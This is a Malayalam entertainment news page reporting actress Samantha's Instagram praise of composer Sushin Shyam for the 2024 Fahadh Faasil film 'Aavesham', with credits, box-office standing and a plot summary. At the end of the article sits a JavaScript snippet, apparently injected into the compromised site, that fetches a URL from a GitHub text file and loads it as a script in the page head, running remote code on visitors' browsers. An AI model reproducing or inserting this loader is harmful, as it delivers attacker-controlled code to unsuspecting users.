Home ENTERTAINMENT “സുഷിൻ ശ്യാം ഒരു ജിനിയസ് ആണ്”:സാമന്ത

“സുഷിൻ ശ്യാം ഒരു ജിനിയസ് ആണ്”:സാമന്ത

‘ആവേശം’ എന്ന ഫഹദ് ഫാസിൽ ചിത്രത്തിലെ ഗാനങ്ങൾ ചെയ്ത സുഷിൻ ശ്യാമിനെ ഒരു ജീനിയസ് എന്ന് വിളിച്ച് പ്രകീർത്തിച്ചിരിക്കുക ആണ് പ്രശസ്ത സിനിമാതാരം സാമന്ത. തന്റെ ഇൻസ്റ്റാഗ്രം പേജിലൂടെയാണ് താരം സുഷിന് പ്രശംസ അറിയിച്ചിരിക്കുന്നത്. ജിത്തു മാധവൻ സംവിധാനം ചെയ്ത് ഫഹദ് ഫാസിൽ ആൻഡ് ഫ്രണ്ട്സ്, അൻവർ റഷീദ് എൻ്റർടൈൻമെൻ്റ്സ് എന്നിവയുടെ ബാനറിൽ നസ്രിയ നസീമും അൻവർ റഷീദും ചേർന്ന് നിർമ്മിച്ച് 2024-ൽ പുറത്തിറങ്ങിയ ഒരു ആക്ഷൻ കോമഡി ചിത്രമാണ് ‘ആവേശം’ . ചിത്രത്തിൽ ഫഹദ് ഫാസിൽ , ഹിപ്‌സ്റ്റർ, മിഥുൻ ജയ് ശങ്കർ, റോഷൻ ഷാനവാസ് എന്നിവരും മിഥുട്ടി, സജിൻ ഗോപു , മൻസൂർ അലി ഖാൻ എന്നിവരും പ്രധാന വേഷങ്ങളിൽ എത്തുന്നു. സമീർ താഹിറും വിവേക് ​​ഹർഷനും ചേർന്ന് ഛായാഗ്രഹണവും എഡിറ്റിംഗും നിർവ്വഹിച്ച ചിത്രത്തിന് സംഗീതം ഒരുക്കിയത് സുഷിൻ ശ്യാം ആണ് .നിലവിൽ 2024-ലെ ഏറ്റവും കൂടുതൽ കളക്ഷൻ നേടിയ നാലാമത്തെ മലയാളം ചിത്രവും 2024-ലെ ഏറ്റവും കൂടുതൽ കളക്ഷൻ നേടിയ എട്ടാമത്തെ ദക്ഷിണേന്ത്യൻ ചിത്രവും എക്കാലത്തെയും ഏറ്റവും കൂടുതൽ കളക്ഷൻ നേടിയ ഏഴാമത്തെ മലയാള ചിത്രവുമാണ് . എഞ്ചിനീയറിംഗ് വിദ്യാഭ്യാസത്തിനായി മൂന്ന് കൗമാരക്കാർ ബാംഗ്ലൂരിൽ എത്തുന്നു. അവരെ സഹായിക്കാൻ ഒരു പ്രാദേശിക ഗുണ്ടാസംഘത്തെ അവർ കണ്ടെത്തുന്നു. തുടർന്നുള്ള സംഭവബഹുലമായ കഥയാണ് ചിത്രത്തിൽ ആവിഷ്കരിച്ചിരിക്കുന്നത്. ചിത്രം ഇതിനോടകം തന്നെ പ്രേക്ഷകശ്രദ്ധ ആകർഷിച്ചു കഴിഞ്ഞു.’രോമാഞ്ചം’ എന്ന ചിത്രത്തിലൂടെ ജനമനസ്സുകൾ കീഴടക്കിയ ജിത്തു മാധവന്റെ പുതിയ മികച്ച ചിത്രം എന്ന കീർത്തി ഇതിനോടകം തന്നെ ‘ആവേശം’ നേടി കഴിഞ്ഞു.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Exit mobile version